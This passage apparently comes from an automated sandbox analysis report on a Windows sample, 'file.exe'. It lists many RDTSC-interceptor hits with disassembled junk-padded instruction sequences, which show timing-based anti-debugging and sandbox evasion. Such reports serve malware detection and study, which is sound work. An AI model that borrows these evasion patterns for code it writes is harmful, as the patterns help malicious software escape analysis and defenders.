popad 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C04295 second address: C04299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C04299 second address: C042AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0F345319EBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C042AD second address: C042B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB042F second address: BB043F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB043F second address: BB044F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F0F34BEC146h 0x0000000a ja 00007F0F34BEC146h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB044F second address: BB0453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB0453 second address: BB0472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F0F34BEC146h 0x00000010 jmp 00007F0F34BEC14Fh 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB0472 second address: BB0476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0765D second address: C0769C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov bx, F5EDh 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F0F34BEC148h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a push 00000000h 0x0000002c mov bl, 71h 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C06770 second address: C0677F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C08772 second address: C08776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C08776 second address: C0877A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0877A second address: C087D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F0F34BEC148h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 jns 00007F0F34BEC148h 0x00000028 mov ebx, dword ptr [ebp+122D3C58h] 0x0000002e push 00000000h 0x00000030 clc 0x00000031 push 00000000h 0x00000033 mov bh, 5Ch 0x00000035 mov di, ax 0x00000038 xchg eax, esi 0x00000039 jmp 00007F0F34BEC14Fh 0x0000003e push eax 0x0000003f jo 00007F0F34BEC14Eh 0x00000045 push ebx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0971B second address: C0971F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0971F second address: C09729 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0F34BEC146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0A75C second address: C0A7D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F0F345319E8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 sub ebx, dword ptr [ebp+122D2414h] 0x0000002b pop edi 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F0F345319E8h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 xchg eax, esi 0x00000049 js 00007F0F345319F0h 0x0000004f jmp 00007F0F345319EAh 0x00000054 push eax 0x00000055 jc 00007F0F345319F2h 0x0000005b jp 00007F0F345319ECh 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0C763 second address: C0C7EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC150h 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c js 00007F0F34BEC154h 0x00000012 pushad 0x00000013 jp 00007F0F34BEC146h 0x00000019 jo 00007F0F34BEC146h 0x0000001f popad 0x00000020 nop 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007F0F34BEC148h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 00000017h 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b adc edi, 0EC0C071h 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push esi 0x00000046 call 00007F0F34BEC148h 0x0000004b pop esi 0x0000004c mov dword ptr [esp+04h], esi 0x00000050 add dword ptr [esp+04h], 00000019h 0x00000058 inc esi 0x00000059 push esi 0x0000005a ret 0x0000005b pop esi 0x0000005c ret 0x0000005d mov ebx, dword ptr [ebp+122D3CE0h] 0x00000063 push 00000000h 0x00000065 mov dword ptr [ebp+122D1F99h], esi 0x0000006b xchg eax, esi 0x0000006c js 00007F0F34BEC14Eh 0x00000072 push edi 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0B8D9 second address: C0B8DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0C7EF second address: C0C7FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0B8DE second address: C0B8E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0C7FB second address: C0C7FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0B8E3 second address: C0B904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jmp 00007F0F345319F5h 0x00000010 pop edi 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0C7FF second address: C0C80D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0D850 second address: C0D854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0CA5C second address: C0CA92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC158h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0F34BEC155h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0D854 second address: C0D85A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0CA92 second address: C0CA96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0CA96 second address: C0CA9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C137FF second address: C13867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0F34BEC150h 0x0000000b pushad 0x0000000c jmp 00007F0F34BEC14Eh 0x00000011 jmp 00007F0F34BEC158h 0x00000016 js 00007F0F34BEC146h 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f popad 0x00000020 pushad 0x00000021 jmp 00007F0F34BEC158h 0x00000026 push eax 0x00000027 push edx 0x00000028 jl 00007F0F34BEC146h 0x0000002e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB3984 second address: BB398A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C13E2A second address: C13E30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0E9E3 second address: C0E9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C13E30 second address: C13E75 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0F34BEC146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F0F34BEC148h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 movzx edi, dx 0x0000002c push 00000000h 0x0000002e sub ebx, dword ptr [ebp+122D3C40h] 0x00000034 push 00000000h 0x00000036 mov dword ptr [ebp+122D1E3Dh], esi 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C13E75 second address: C13E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C13E7C second address: C13E91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F34BEC151h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0DA78 second address: C0DA7E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C11A66 second address: C11A6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14DA3 second address: C14DDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007F0F345319E6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jmp 00007F0F345319F8h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0F345319F1h 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C140BA second address: C140CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C140CF second address: C140D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C15E27 second address: C15E2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C15E2D second address: C15E8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 add edi, dword ptr [ebp+1244C22Dh] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F0F345319E8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b sub bh, FFFFFF97h 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+12458D61h], esi 0x00000036 xchg eax, esi 0x00000037 jnp 00007F0F345319F9h 0x0000003d push eax 0x0000003e jp 00007F0F345319EEh 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C16013 second address: C16017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2A1B5 second address: C2A1CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnc 00007F0F345319E6h 0x0000000c jmp 00007F0F345319EDh 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2A1CF second address: C2A1D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2A1D5 second address: C2A1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2A1DB second address: C2A1DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2A1DF second address: C2A1E9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0F345319E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C29506 second address: C2950C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2950C second address: C29512 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C29512 second address: C29518 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C29518 second address: C2951C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2951C second address: C29530 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0F34BEC146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F0F34BEC146h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C29530 second address: C29536 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C29800 second address: C2980F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC14Bh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2980F second address: C2981D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C299B2 second address: C299CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC155h 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C299CF second address: C299D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C299D9 second address: C299E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2F82E second address: C2F834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2F834 second address: C2F84D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pushad 0x00000006 popad 0x00000007 jp 00007F0F34BEC146h 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F0F34BEC146h 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2F84D second address: C2F851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2F851 second address: C2F861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F0F34BEC146h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2F861 second address: C2F865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2F865 second address: C2F86F instructions: 0x00000000 rdtsc 0x00000002 js 00007F0F34BEC146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2F86F second address: C2F87B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F0F345319E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2F87B second address: C2F87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2EB46 second address: C2EB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2F0CD second address: C2F0D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2F0D1 second address: C2F0D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2F227 second address: C2F234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF92EC second address: BF92F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF982B second address: BF982F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF982F second address: BF9833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF9833 second address: BF9841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F0F34BEC146h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF9841 second address: BF9845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF9927 second address: BF9952 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007F0F34BEC146h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e add dword ptr [esp], 5C458550h 0x00000015 cmc 0x00000016 push 9B17C2AEh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jns 00007F0F34BEC146h 0x00000024 jnl 00007F0F34BEC146h 0x0000002a popad 0x0000002b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF9ABD second address: BF9AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF9AC1 second address: BF9B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F0F34BEC151h 0x0000000c jmp 00007F0F34BEC14Bh 0x00000011 popad 0x00000012 push eax 0x00000013 jp 00007F0F34BEC15Ah 0x00000019 jmp 00007F0F34BEC154h 0x0000001e xchg eax, esi 0x0000001f mov dword ptr [ebp+122D2C2Ch], edi 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jnl 00007F0F34BEC146h 0x00000030 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF9B06 second address: BF9B0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF9B0C second address: BF9B13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF9BCC second address: BF9C1F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0F345319E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F0F345319F4h 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 jmp 00007F0F345319EEh 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f jmp 00007F0F345319F4h 0x00000024 mov eax, dword ptr [eax] 0x00000026 push esi 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF9C1F second address: BF9C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF9E77 second address: BF9E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF9E7B second address: BF9EB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0F34BEC151h 0x0000000b popad 0x0000000c nop 0x0000000d sbb edx, 2DCDE361h 0x00000013 push 00000004h 0x00000015 adc edx, 54241085h 0x0000001b nop 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0F34BEC150h 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF9EB6 second address: BF9EE5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F0F345319E6h 0x0000000d jmp 00007F0F345319F9h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
